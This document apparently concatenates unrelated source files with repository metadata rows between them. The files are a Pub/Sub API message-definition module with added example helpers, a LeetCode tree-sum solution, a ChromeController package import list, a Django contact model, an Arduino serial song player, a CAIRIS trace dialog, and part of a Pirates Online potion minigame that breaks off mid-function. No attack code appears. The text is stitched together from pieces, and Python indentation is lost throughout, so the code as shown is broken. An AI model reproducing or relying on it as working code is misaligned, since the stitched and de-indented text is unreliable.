The endpoint version is based on the version of the Pub/Sub API. If not
present during the `CreateSubscription` call, it will default to the
    version of the API used to make such a call. If not present during a
`ModifyPushConfig` call, its value will not be changed. `GetSubscription`
calls will always return a valid version, even if the subscription was
created without this attribute. The possible values for this attribute
are: * `v1beta1`: uses the push format defined in the v1beta1 Pub/Sub
API. * `v1` or `v1beta2`: uses the push format defined in the v1 Pub/Sub
API.
Messages:
AdditionalProperty: An additional property for a AttributesValue object.
Fields:
additionalProperties: Additional properties of type AttributesValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a AttributesValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
attributes = _messages.MessageField('AttributesValue', 1)
oidcToken = _messages.MessageField('OidcToken', 2)
pushEndpoint = _messages.StringField(3)
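
# Illustrative sketch only: a push configuration exercising the fields described
# above. The endpoint URL, service account email and the `x-goog-version` value
# are placeholder assumptions, not required values.
def _examplePushConfig():
  attrs = PushConfig.AttributesValue(additionalProperties=[
      PushConfig.AttributesValue.AdditionalProperty(
          key='x-goog-version', value='v1')])
  return PushConfig(
      pushEndpoint='https://example.com/push',
      attributes=attrs,
      oidcToken=OidcToken(serviceAccountEmail='[email protected]'))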
class ReceivedMessage(_messages.Message):
r"""A message and its corresponding acknowledgment ID.
Fields:
ackId: This ID can be used to acknowledge the received message.
message: The message.
"""
ackId = _messages.StringField(1)
message = _messages.MessageField('PubsubMessage', 2)
class SeekRequest(_messages.Message):
r"""Request for the `Seek` method.
Fields:
snapshot: The snapshot to seek to. The snapshot's topic must be the same
as that of the provided subscription. Format is
`projects/{project}/snapshots/{snap}`.
time: The time to seek to. Messages retained in the subscription that were
published before this time are marked as acknowledged, and messages
retained in the subscription that were published after this time are
marked as unacknowledged. Note that this operation affects only those
messages retained in the subscription (configured by the combination of
`message_retention_duration` and `retain_acked_messages`). For example,
if `time` corresponds to a point before the message retention window (or
to a point before the system's notion of the subscription creation
time), only retained messages will be marked as unacknowledged, and
already-expunged messages will not be restored.
"""
snapshot = _messages.StringField(1)
time = _messages.StringField(2)
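
# Illustrative sketch only: the two alternative seek targets described above --
# a named snapshot, or a point in time given as an RFC 3339 timestamp string.
# The resource path and timestamp are placeholders.
def _exampleSeekRequests():
  to_snapshot = SeekRequest(snapshot='projects/my-project/snapshots/my-snap')
  to_time = SeekRequest(time='2019-01-01T00:00:00Z')
  return to_snapshot, to_time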
class SeekResponse(_messages.Message):
r"""Response for the `Seek` method (this response is empty)."""
class SetIamPolicyRequest(_messages.Message):
r"""Request message for `SetIamPolicy` method.
Fields:
policy: REQUIRED: The complete policy to be applied to the `resource`. The
size of the policy is limited to a few 10s of KB. An empty policy is a
valid policy but certain Cloud Platform services (such as Projects)
might reject them.
"""
policy = _messages.MessageField('Policy', 1)
class Snapshot(_messages.Message):
r"""A snapshot resource. Snapshots are used in <a
href="https://cloud.google.com/pubsub/docs/replay-overview">Seek</a>
operations, which allow you to manage message acknowledgments in bulk. That
is, you can set the acknowledgment state of messages in an existing
subscription to the state captured by a snapshot.
Messages:
LabelsValue: See <a href="https://cloud.google.com/pubsub/docs/labels">
Creating and managing labels</a>.
Fields:
expireTime: The snapshot is guaranteed to exist up until this time. A
newly-created snapshot expires no later than 7 days from the time of its
creation. Its exact lifetime is determined at creation by the existing
backlog in the source subscription. Specifically, the lifetime of the
snapshot is `7 days - (age of oldest unacked message in the
subscription)`. For example, consider a subscription whose oldest
unacked message is 3 days old. If a snapshot is created from this
subscription, the snapshot -- which will always capture this 3-day-old
backlog as long as the snapshot exists -- will expire in 4 days. The
service will refuse to create a snapshot that would expire in less than
1 hour after creation.
labels: See <a href="https://cloud.google.com/pubsub/docs/labels">
Creating and managing labels</a>.
name: The name of the snapshot.
topic: The name of the topic from which this snapshot is retaining
messages.
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class LabelsValue(_messages.Message):
r"""See <a href="https://cloud.google.com/pubsub/docs/labels"> Creating
and managing labels</a>.
Messages:
AdditionalProperty: An additional property for a LabelsValue object.
Fields:
additionalProperties: Additional properties of type LabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a LabelsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
expireTime = _messages.StringField(1)
labels = _messages.MessageField('LabelsValue', 2)
name = _messages.StringField(3)
topic = _messages.StringField(4)
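
# Illustrative sketch only: the snapshot lifetime rule quoted in the docstring
# above, `7 days - (age of oldest unacked message in the subscription)`, as a
# tiny helper. With a 3-day-old backlog it gives the documented ~4 days; this
# is local arithmetic, not an API call.
def _exampleSnapshotLifetimeDays(oldest_unacked_age_days):
  return max(7.0 - oldest_unacked_age_days, 0.0)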
class StandardQueryParameters(_messages.Message):
r"""Query parameters accepted by all methods.
Enums:
FXgafvValueValuesEnum: V1 error format.
AltValueValuesEnum: Data format for response.
Fields:
f__xgafv: V1 error format.
access_token: OAuth access token.
alt: Data format for response.
callback: JSONP
fields: Selector specifying which fields to include in a partial response.
key: API key. Your API key identifies your project and provides you with
API access, quota, and reports. Required unless you provide an OAuth 2.0
token.
oauth_token: OAuth 2.0 token for the current user.
prettyPrint: Returns response with indentations and line breaks.
quotaUser: Available to use for quota purposes for server-side
applications. Can be any arbitrary string assigned to a user, but should
not exceed 40 characters.
trace: A tracing token of the form "token:<tokenid>" to include in api
requests.
uploadType: Legacy upload protocol for media (e.g. "media", "multipart").
upload_protocol: Upload protocol for media (e.g. "raw", "multipart").
"""
class AltValueValuesEnum(_messages.Enum):
r"""Data format for response.
Values:
json: Responses with Content-Type of application/json
media: Media download with context-dependent Content-Type
proto: Responses with Content-Type of application/x-protobuf
"""
json = 0
media = 1
proto = 2
class FXgafvValueValuesEnum(_messages.Enum):
r"""V1 error format.
Values:
_1: v1 error format
_2: v2 error format
"""
_1 = 0
_2 = 1
f__xgafv = _messages.EnumField('FXgafvValueValuesEnum', 1)
access_token = _messages.StringField(2)
alt = _messages.EnumField('AltValueValuesEnum', 3, default=u'json')
callback = _messages.StringField(4)
fields = _messages.StringField(5)
key = _messages.StringField(6)
oauth_token = _messages.StringField(7)
prettyPrint = _messages.BooleanField(8, default=True)
quotaUser = _messages.StringField(9)
trace = _messages.StringField(10)
uploadType = _messages.StringField(11)
upload_protocol = _messages.StringField(12)
class Subscription(_messages.Message):
r"""A subscription resource.
Messages:
LabelsValue: See <a href="https://cloud.google.com/pubsub/docs/labels">
Creating and managing labels</a>.
Fields:
ackDeadlineSeconds: The approximate amount of time (on a best-effort
basis) Pub/Sub waits for the subscriber to acknowledge receipt before
resending the message. In the interval after the message is delivered
and before it is acknowledged, it is considered to be
<i>outstanding</i>. During that time period, the message will not be
redelivered (on a best-effort basis). For pull subscriptions, this
value is used as the initial value for the ack deadline. To override
this value for a given message, call `ModifyAckDeadline` with the
corresponding `ack_id` if using non-streaming pull or send the `ack_id`
in a `StreamingModifyAckDeadlineRequest` if using streaming pull. The
minimum custom deadline you can specify is 10 seconds. The maximum
custom deadline you can specify is 600 seconds (10 minutes). If this
parameter is 0, a default value of 10 seconds is used. For push
delivery, this value is also used to set the request timeout for the
call to the push endpoint. If the subscriber never acknowledges the
message, the Pub/Sub system will eventually redeliver the message.
expirationPolicy: A policy that specifies the conditions for this
subscription's expiration. A subscription is considered active as long
as any connected subscriber is successfully consuming messages from the
subscription or is issuing operations on the subscription. If
`expiration_policy` is not set, a *default policy* with `ttl` of 31 days
will be used. The minimum allowed value for `expiration_policy.ttl` is 1
day. <b>BETA:</b> This feature is part of a beta release. This API might
be changed in backward-incompatible ways and is not recommended for
production use. It is not subject to any SLA or deprecation policy.
labels: See <a href="https://cloud.google.com/pubsub/docs/labels">
Creating and managing labels</a>.
messageRetentionDuration: How long to retain unacknowledged messages in
the subscription's backlog, from the moment a message is published. If
`retain_acked_messages` is true, then this also configures the retention
of acknowledged messages, and thus configures how far back in time a
`Seek` can be done. Defaults to 7 days. Cannot be more than 7 days or
less than 10 minutes.
name: The name of the subscription. It must have the format
`"projects/{project}/subscriptions/{subscription}"`. `{subscription}`
must start with a letter, and contain only letters (`[A-Za-z]`), numbers
(`[0-9]`), dashes (`-`), underscores (`_`), periods (`.`), tildes (`~`),
plus (`+`) or percent signs (`%`). It must be between 3 and 255
characters in length, and it must not start with `"goog"`.
pushConfig: If push delivery is used with this subscription, this field is
used to configure it. An empty `pushConfig` signifies that the
subscriber will pull and ack messages using API methods.
retainAckedMessages: Indicates whether to retain acknowledged messages. If
true, then messages are not expunged from the subscription's backlog,
even if they are acknowledged, until they fall out of the
`message_retention_duration` window. This must be true if you would like
to <a href="https://cloud.google.com/pubsub/docs/replay-
overview#seek_to_a_time"> Seek to a timestamp</a>.
topic: The name of the topic from which this subscription is receiving
messages. Format is `projects/{project}/topics/{topic}`. The value of
this field will be `_deleted-topic_` if the topic has been deleted.
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class LabelsValue(_messages.Message):
r"""See <a href="https://cloud.google.com/pubsub/docs/labels"> Creating
and managing labels</a>.
Messages:
AdditionalProperty: An additional property for a LabelsValue object.
Fields:
additionalProperties: Additional properties of type LabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a LabelsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
ackDeadlineSeconds = _messages.IntegerField(1, variant=_messages.Variant.INT32)
expirationPolicy = _messages.MessageField('ExpirationPolicy', 2)
labels = _messages.MessageField('LabelsValue', 3)
messageRetentionDuration = _messages.StringField(4)
name = _messages.StringField(5)
pushConfig = _messages.MessageField('PushConfig', 6)
retainAckedMessages = _messages.BooleanField(7)
topic = _messages.StringField(8)
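
# Illustrative sketch only: a Subscription combining fields documented above --
# a 60s ack deadline, acked-message retention (so Seek-to-time works) and pull
# delivery (no pushConfig). The resource names and durations are placeholders.
def _exampleSubscription():
  return Subscription(
      name='projects/my-project/subscriptions/my-sub',
      topic='projects/my-project/topics/my-topic',
      ackDeadlineSeconds=60,
      retainAckedMessages=True,
      messageRetentionDuration='604800s')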
class TestIamPermissionsRequest(_messages.Message):
r"""Request message for `TestIamPermissions` method.
Fields:
permissions: The set of permissions to check for the `resource`.
Permissions with wildcards (such as '*' or 'storage.*') are not allowed.
For more information see [IAM
Overview](https://cloud.google.com/iam/docs/overview#permissions).
"""
permissions = _messages.StringField(1, repeated=True)
class TestIamPermissionsResponse(_messages.Message):
r"""Response message for `TestIamPermissions` method.
Fields:
permissions: A subset of `TestPermissionsRequest.permissions` that the
caller is allowed.
"""
permissions = _messages.StringField(1, repeated=True)
class Topic(_messages.Message):
r"""A topic resource.
Messages:
LabelsValue: See <a href="https://cloud.google.com/pubsub/docs/labels">
Creating and managing labels</a>.
Fields:
kmsKeyName: The resource name of the Cloud KMS CryptoKey to be used to
protect access to messages published on this topic. The expected format
is `projects/*/locations/*/keyRings/*/cryptoKeys/*`.
labels: See <a href="https://cloud.google.com/pubsub/docs/labels">
Creating and managing labels</a>.
messageStoragePolicy: Policy constraining how messages published to the
topic may be stored. It is determined when the topic is created based on
the policy configured at the project level. It must not be set by the
caller in the request to CreateTopic or to UpdateTopic. This field will
be populated in the responses for GetTopic, CreateTopic, and
UpdateTopic: if not present in the response, then no constraints are in
effect.
name: The name of the topic. It must have the format
`"projects/{project}/topics/{topic}"`. `{topic}` must start with a
letter, and contain only letters (`[A-Za-z]`), numbers (`[0-9]`), dashes
(`-`), underscores (`_`), periods (`.`), tildes (`~`), plus (`+`) or
percent signs (`%`). It must be between 3 and 255 characters in length,
and it must not start with `"goog"`.
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class LabelsValue(_messages.Message):
r"""See <a href="https://cloud.google.com/pubsub/docs/labels"> Creating
and managing labels</a>.
Messages:
AdditionalProperty: An additional property for a LabelsValue object.
Fields:
additionalProperties: Additional properties of type LabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a LabelsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
kmsKeyName = _messages.StringField(1)
labels = _messages.MessageField('LabelsValue', 2)
messageStoragePolicy = _messages.MessageField('MessageStoragePolicy', 3)
name = _messages.StringField(4)
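
# Illustrative sketch only: a Topic whose name follows the format rules in the
# docstring above and that references a Cloud KMS CryptoKey; both resource
# paths are placeholders.
def _exampleTopic():
  return Topic(
      name='projects/my-project/topics/my-topic',
      kmsKeyName='projects/my-project/locations/global/keyRings/my-ring/cryptoKeys/my-key')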
class UpdateSnapshotRequest(_messages.Message):
r"""Request for the UpdateSnapshot method.
Fields:
snapshot: The updated snapshot object.
updateMask: Indicates which fields in the provided snapshot to update.
Must be specified and non-empty.
"""
snapshot = _messages.MessageField('Snapshot', 1)
updateMask = _messages.StringField(2)
class UpdateSubscriptionRequest(_messages.Message):
r"""Request for the UpdateSubscription method.
Fields:
subscription: The updated subscription object.
updateMask: Indicates which fields in the provided subscription to update.
Must be specified and non-empty.
"""
subscription = _messages.MessageField('Subscription', 1)
updateMask = _messages.StringField(2)
class UpdateTopicRequest(_messages.Message):
r"""Request for the UpdateTopic method.
Fields:
topic: The updated topic object.
updateMask: Indicates which fields in the provided topic to update. Must
be specified and non-empty. Note that if `update_mask` contains
"message_storage_policy" then the new value will be determined based on
the policy configured at the project or organization level. The
`message_storage_policy` must not be set in the `topic` provided above.
"""
topic = _messages.MessageField('Topic', 1)
updateMask = _messages.StringField(2)
encoding.AddCustomJsonFieldMapping(
StandardQueryParameters, 'f__xgafv', '$.xgafv')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_1', '1')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_2', '2')
| [
"[email protected]"
] | |
12715c528873546ae9649b4dbb52876cf6d0505b | f90522eee8d87c1486f32f3801a67141f7aee15f | /0129.Sum Root to Leaf Numbers/solution.py | a5789c653314b4d53aacfa3e2860b7adcd4c6bbb | [
"Apache-2.0"
] | permissive | zhlinh/leetcode | 15a30af8439e664d2a5f1aa328baf96f0f1791da | 6dfa0a4df9ec07b2c746a13c8257780880ea04af | refs/heads/master | 2021-01-15T15:49:25.525816 | 2016-09-20T03:24:10 | 2016-09-20T03:24:10 | 48,949,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,386 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
*****************************************
Author: zhlinh
Email: [email protected]
Version: 0.0.1
Created Time: 2016-03-11
Last_modify: 2016-03-11
******************************************
'''
'''
Given a binary tree containing digits from 0-9 only,
each root-to-leaf path could represent a number.
An example is the root-to-leaf path 1->2->3
which represents the number 123.
Find the total sum of all root-to-leaf numbers.
For example,
1
/ \
2 3
The root-to-leaf path 1->2 represents the number 12.
The root-to-leaf path 1->3 represents the number 13.
Return the sum = 12 + 13 = 25.
'''
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
totalSum = 0
def sumNumbers(self, root):
"""
:type root: TreeNode
:rtype: int
"""
if not root:
return 0
self.helper(root, 0)
return self.totalSum
def helper(self, root, num):
num = num * 10 + root.val
if not root.left and not root.right:
self.totalSum += num
return
if root.left:
self.helper(root.left, num)
if root.right:
self.helper(root.right, num)
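
if __name__ == '__main__':
    # Small self-check, added for illustration (not part of the original
    # submission): the tree from the docstring above, 1 with children 2 and 3,
    # should print 12 + 13 = 25.
    root = TreeNode(1)
    root.left = TreeNode(2)
    root.right = TreeNode(3)
    print(Solution().sumNumbers(root))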
| [
"[email protected]"
] | |
3b6849ee78281ae2e1737249fd55941971b110fc | 7ab4cdf01de10faa0b5e6103cb98f4a1447b38e1 | /ChromeController/__init__.py | 29f415a8675ecb9d895139a843ac001249a70336 | [
"BSD-3-Clause"
] | permissive | acskurucz/ChromeController | 619a0d46db60809bbe1188dc1d7230e3ef2dba47 | 4294c1ca7db9569a976710c7c219069eb07d28bf | refs/heads/master | 2020-12-08T16:40:32.528694 | 2020-01-10T12:36:28 | 2020-01-10T12:36:28 | 233,036,106 | 0 | 0 | BSD-3-Clause | 2020-01-10T11:47:56 | 2020-01-10T11:47:55 | null | UTF-8 | Python | false | false | 687 | py |
from .tab_pool import TabPooledChromium
from .chrome_context import ChromeContext
from .transport import ChromeExecutionManager
from .manager import ChromeRemoteDebugInterface
from .Generator import gen
from .cr_exceptions import ChromeControllerException
from .cr_exceptions import ChromeStartupException
from .cr_exceptions import ReusedPortError
from .cr_exceptions import ChromeConnectFailure
from .cr_exceptions import ChromeCommunicationsError
from .cr_exceptions import ChromeTabNotFoundError
from .cr_exceptions import ChromeError
from .cr_exceptions import ChromeDiedError
from .cr_exceptions import ChromeNavigateTimedOut
from .cr_exceptions import ChromeResponseNotReceived | [
"[email protected]"
] | |
9bd4b64ebb38e2e59820dd722970e0e96371a90f | 54c22fdcb44c42b1c0855be576e934939a2a2c5c | /contragents/models.py | 0b10a0036da5a0300652633c3a2677971c2eb556 | [] | no_license | flashboyka/build_yard | 84e50600e03c0124f1fdf3991491852f5f469774 | c25b419f445bc5c751966850f3860cf19dfd33a1 | refs/heads/master | 2020-12-11T06:43:44.601335 | 2020-01-15T14:34:37 | 2020-01-15T14:34:37 | 233,791,548 | 0 | 0 | null | 2020-01-14T08:19:53 | 2020-01-14T08:19:52 | null | UTF-8 | Python | false | false | 716 | py | from django.db import models
class Contragent(models.Model):
last_name = models.CharField(max_length=25, verbose_name='Фамилия')
first_name = models.CharField(max_length=25, verbose_name='Имя')
middle_name = models.CharField(max_length=25, verbose_name='Отчество')
email = models.EmailField(verbose_name='Почта')
phone = models.CharField(max_length=13, verbose_name='Номер телефона')
address = models.TextField(verbose_name='Адрес')
def __str__(self):
return f'{self.last_name} {self.first_name} {self.middle_name}'
class Meta:
verbose_name = 'Контрагента'
verbose_name_plural = 'Контрагенты'
| [
"[email protected]"
] | |
9dff0431f838a1a504fe9b24ea59c733529ae5fa | 25d6371928dc91e2593edf04d7428f4cf886da42 | /students/wzh/pyfile/playmusic.py | 3cec9f688f00be432a2e29637a297462a40713ab | [] | no_license | ophwsjtu18/ohw | 7d4ecca6fc98cadbabd3c088c0d69efa3d20a10f | 67677baad6d0b92d3d453309b66ed274c097dfd6 | refs/heads/master | 2021-05-25T10:28:59.872340 | 2018-12-19T13:18:34 | 2018-12-19T13:18:34 | 127,097,829 | 1 | 3 | null | 2018-11-07T10:53:03 | 2018-03-28T06:58:57 | Python | UTF-8 | Python | false | false | 929 | py | import serial
import serial.tools.list_ports
import time
import csv

print ('hello')
ports = list(serial.tools.list_ports.comports())
print (ports)

# Build a {song name: list of note codes} dictionary from the CSV file.
f = open("song.csv", 'r')
songs = list(csv.reader(f))
f.close()
song_dictionary = {}
for song in songs:
    song_dictionary[song[0]] = song[1:]

# Pick the first serial port that looks like an Arduino (USB-serial/UART bridge).
ser = None
for p in ports:
    print (p[1])
    if "SERIAL" in p[1] or "UART" in p[1]:
        ser = serial.Serial(port=p[0])
        break
if ser is None:
    print ("No Arduino Device was found connected to the computer")
#ser=serial.Serial(port='COM4')
#ser=serial.Serial(port='/dev/ttymodem542')
#wait 2 seconds for arduino board restart
time.sleep(2)

def run():
    # Keep asking for a song name; 'q' quits, anything else is looked up in the
    # CSV and its notes are written to the Arduino one by one.
    while True:
        print ('q for quit, a song name to play it')
        name = input()
        if name == "q":
            break
        for voice in song_dictionary[name]:
            ser.write(voice.encode())
            ser.write("a".encode())
            time.sleep(0.1)

run()
| [
"[email protected]"
] | |
7fff60cccdbfed5de914c812bb9d37476fabd96d | 4ed038a638725ac77731b0b97ddd61aa37dd8d89 | /cairis/gui/TraceDialog.py | 93dfa69fbf3f7c968e04ca274567b4895b3f5e8f | [
"Apache-2.0"
] | permissive | RachelLar/cairis_update | 0b784101c4aff81ff0390328eb615e335301daa2 | 0b1d6d17ce49bc74887d1684e28c53c1b06e2fa2 | refs/heads/master | 2021-01-19T06:25:47.644993 | 2016-07-11T20:48:11 | 2016-07-11T20:48:11 | 63,103,727 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,041 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import wx
from cairis.core.armid import *
import WidgetFactory
import cairis.core.TraceParameters as TraceParameters
import cairis.core.UpdateTraceParameters as UpdateTraceParameters
import TracePanel
class TraceDialog(wx.Dialog):
def __init__(self,parent,parameters):
wx.Dialog.__init__(self,parent,parameters.id(),parameters.label(),style=wx.DEFAULT_DIALOG_STYLE|wx.MAXIMIZE_BOX|wx.THICK_FRAME|wx.RESIZE_BORDER,size=(400,275))
if (parameters.__class__.__name__ == 'TraceDialogParameters'):
self.theOriginalFromObject = parameters.fromObject()
self.theOriginalFromId = parameters.fromId()
self.theOriginalToObject = parameters.toObject()
self.theOriginalToId = parameters.toId()
else:
self.theOriginalFromObject = -1
self.theOriginalFromId = -1
self.theOriginalToObject = -1
self.theOriginalToId = -1
self.theFromObject = -1
self.theFromId = -1
self.theToObject = -1
self.theToId = -1
self.panel = 0
self.buildControls(parameters)
self.theCommitVerb = 'Add'
def buildControls(self,parameters):
mainSizer = wx.BoxSizer(wx.VERTICAL)
self.panel = TracePanel.TracePanel(self)
self.panel.buildControls(parameters.createFlag())
mainSizer.Add(self.panel,1,wx.EXPAND)
self.SetSizer(mainSizer)
wx.EVT_BUTTON(self,TRACE_BUTTONCOMMIT_ID,self.onCommit)
def load(self,threat):
self.panel.loadControls(threat)
self.theCommitVerb = 'Edit'
def onCommit(self,evt):
self.theFromObject = self.panel.theFromObject
self.theFromId = self.panel.theFromId
self.theToObject = self.panel.theToObject
self.theToId = self.panel.theToId
self.theFromName = self.panel.theFromName
self.theToName = self.panel.theToName
self.EndModal(TRACE_BUTTONCOMMIT_ID)
def parameters(self):
parameters = 0
if (self.theOriginalFromObject == -1):
parameters = TraceParameters.TraceParameters(self.theFromObject,self.theFromId,self.theToObject,self.theToId,self.theFromName,self.theToName)
else:
parameters = UpdateTraceParameters.UpdateTraceParameters(self.theFromObject,self.theFromId,self.theToObject,self.theToId,self.theFromName,self.theToName,self.theOriginalFromId,self.theOriginalToId)
parameters.setId(-1)
return parameters
| [
"[email protected]"
] | |
674c9caf989517d884df5cd86a772c7b2a442b8f | ebd5c4632bb5f85c9e3311fd70f6f1bf92fae53f | /PORMain/pirates/minigame/PotionGame.py | 92f957bb8a84e1eba8affaa25371084e8a01f38f | [] | no_license | BrandonAlex/Pirates-Online-Retribution | 7f881a64ec74e595aaf62e78a39375d2d51f4d2e | 980b7448f798e255eecfb6bd2ebb67b299b27dd7 | refs/heads/master | 2020-04-02T14:22:28.626453 | 2018-10-24T15:33:17 | 2018-10-24T15:33:17 | 154,521,816 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 20,463 | py | from panda3d.core import CardMaker, NodePath, TextNode
# File: P (Python 2.4)
from direct.interval.IntervalGlobal import Sequence, Func
from direct.showbase.ShowBaseGlobal import *
from direct.interval.IntervalGlobal import *
from direct.gui.DirectGui import *
from pirates.piratesgui.GuiPanel import *
from direct.showbase import DirectObject
from direct.task import Task
from PotionGameFSM import PotionGameFSM
from PotionRecipePicker import PotionRecipePicker
from PotionRecipe import PotionRecipe
from PotionResults import PotionResults
from PotionFail import PotionFail
from PotionBoardPiece import PotionBoardPiece
from PotionGameBoard import PotionGameBoard
from PotionHint import PotionHint
from PotionInfo import PotionInfo
import PotionGlobals
import PotionRecipeData
from pirates.piratesgui import GuiButton
from pirates.piratesgui import PiratesGuiGlobals
from pirates.piratesgui import PiratesConfirm
from pirates.piratesgui import ReputationMeter
from pirates.piratesgui import GuiManager
from pirates.piratesbase import PLocalizer
from pirates.audio import SoundGlobals
from pirates.audio.SoundGlobals import loadSfx
from pirates.uberdog.UberDogGlobals import InventoryType, InventoryCategory
import math
class PotionGame(DirectObject.DirectObject):
def __init__(self, dist):
self.dist = dist
self.askToExit = False
self.askToReturn = False
self.askForHint = False
self.askForInfo = False
self.soulMade = False
self.soulMatch = False
self.closeCurrentDialog = None
self.animationList = []
self.postAnimationList = []
self.setupScene()
self.gameFSM = PotionGameFSM(self)
self.gameFSM.request('Intro')
self.accept('clientLogout', self.destroy)
self.confirm = None
def chestOpened(self):
pass
def chestClosed(self):
pass
def setupScene(self):
base.loadingScreen.tick()
base.disableMouse()
self._initGUI()
base.loadingScreen.beginStep('setupScene', 9, 45)
base.loadingScreen.tick()
self.hintScreen = PotionHint(self)
self.hintScreen.stash()
base.loadingScreen.tick()
self.infoScreen = PotionInfo(self)
self.infoScreen.stash()
base.loadingScreen.tick()
self.currentRecipe = None
self.recipes = []
for recipeData in PotionRecipeData.PotionRecipeList:
valid = True
if recipeData.get('disabled', False):
continue
for ingredient in recipeData['ingredients']:
if ingredient['color'] not in PotionRecipeData.PotionColorSets[self.dist.colorSet]:
valid = False
continue
newRecipe = PotionRecipe(self, recipeData['potionID'], recipeData['name'], recipeData['desc'], recipeData['ingredients'], recipeData['level'], recipeData['free'], recipeData.get('questOnly', False))
if valid:
newRecipe.available = True
else:
newRecipe.available = False
self.recipes.append(newRecipe)
for recipe in self.recipes:
recipe.setPos(-1.1, 0, -0.65)
self.recipePicker = PotionRecipePicker(self)
base.loadingScreen.tick()
(self.recipePicker.setPos(0.0, 0.0, 0.0),)
self.recipePicker.setEnabled(False)
self.recipePicker.stash()
self.resultsScreen = PotionResults(self)
self.resultsScreen.stash()
base.loadingScreen.tick()
self.failScreen = PotionFail(self)
self.failScreen.stash()
base.loadingScreen.tick()
self._initIntervals()
base.loadingScreen.tick()
self.gameBoard = PotionGameBoard(self)
self.gameBoard.setPos(0.1, 0, -0.705)
base.loadingScreen.tick()
self.unlockList = []
base.musicMgr.request(SoundGlobals.MUSIC_MINIGAME_POTION, priority = 1, volume = 0.4)
base.loadingScreen.endStep('setupScene')
def resetScene(self):
self.gameBoard.resetBoard()
if self.currentRecipe is not None:
self.currentRecipe.stash()
def _initGUI(self):
base.loadingScreen.beginStep('init Gui', 4, 55)
cm = CardMaker('PotionBackground')
cm.setFrame(-10, 10, -10, 10)
cm.setColor(0, 0, 0, 1)
self.background = NodePath(cm.generate())
self.background.reparentTo(aspect2d)
self.background.setBin('background', -100)
self.xpBackground = NodePath('PotionXPBackground')
self.xpBackground.reparentTo(aspect2d)
self.xpBackground.setBin('background', -95)
base.loadingScreen.tick()
self.dialogs = NodePath('DialogBackground')
self.dialogs.reparentTo(aspect2d)
self.dialogs.setBin('background', -70)
self.buttonsBackground = NodePath('PotionButtonBackground')
self.buttonsBackground.reparentTo(base.a2dBottomRight)
self.buttonsBackground.setBin('background', -90)
textureCard = loader.loadModel('models/minigames/pir_m_gui_pot_textureCard')
self.stretchedBackgroundTextureCard = textureCard.find('**/pir_t_gui_pot_background')
self.stretchedBackgroundTextureCard.reparentTo(self.background)
self.stretchedBackgroundTextureCard.setScale(3.4, 1.0, 3.4)
self.stretchedBackgroundTextureCard.setPos(0.0, 20.0, 0.0)
fadecm = CardMaker('card')
fadecm.setFrameFullscreenQuad()
self.fadeIn = render2d.attachNewNode(fadecm.generate())
self.fadeIn.setBin('background', -50)
self.fadeIn.setPos(0.0, -30.0, 0.0)
self.fadeIn.setColor(0, 0, 0, 1.0)
self.fadeIn.setTransparency(True)
base.loadingScreen.tick()
cm = CardMaker('card')
cm.setFrame(0, 1, 0.01, 0.01)
self.foregroundLayer = aspect2d.attachNewNode(cm.generate())
self.foregroundTextureCard = textureCard.find('**/pir_t_gui_pot_foreground')
self.foregroundTextureCard.setScale(0.8, 1.0, 0.4)
self.foregroundTextureCard.setPos(-0.7, -20.0, 0.8)
self.foregroundTextureCard.setBin('background', -80)
self.foregroundTextureCard.copyTo(self.foregroundLayer)
self.repMeter = ReputationMeter.ReputationMeter(InventoryType.PotionsRep, width = 0.56)
inv = localAvatar.getInventory()
self.repMeter.reparentTo(self.xpBackground)
self.repMeter.setPos(0, 0, -0.95)
self.repMeter.update(inv.getAccumulator(InventoryType.PotionsRep))
localAvatar.guiMgr.registerReputationHandler(self.updateRepMeter)
base.loadingScreen.tick()
self.closeButton = GuiButton.GuiButton(image = (textureCard.find('**/pir_t_gui_pot_escape'), textureCard.find('**/pir_t_gui_pot_escapeOn'), textureCard.find('**/pir_t_gui_pot_escapeOn'), textureCard.find('**/pir_t_gui_pot_escape')), image_scale = (0.1, 0.1, 0.1), image_pos = (0.075, 0, 0.08), hotkeys = [
'Escape'], hotkeyLabel = PLocalizer.PotionGui['ExitButton'], pos = (-0.4, 0.0, 0.01), text0_fg = PotionGlobals.TextColor, text1_fg = PiratesGuiGlobals.TextFG0, text2_fg = PiratesGuiGlobals.TextFG15, text3_fg = PotionGlobals.TextColorDisabled, parent = self.buttonsBackground, command = self.confirmQuit)
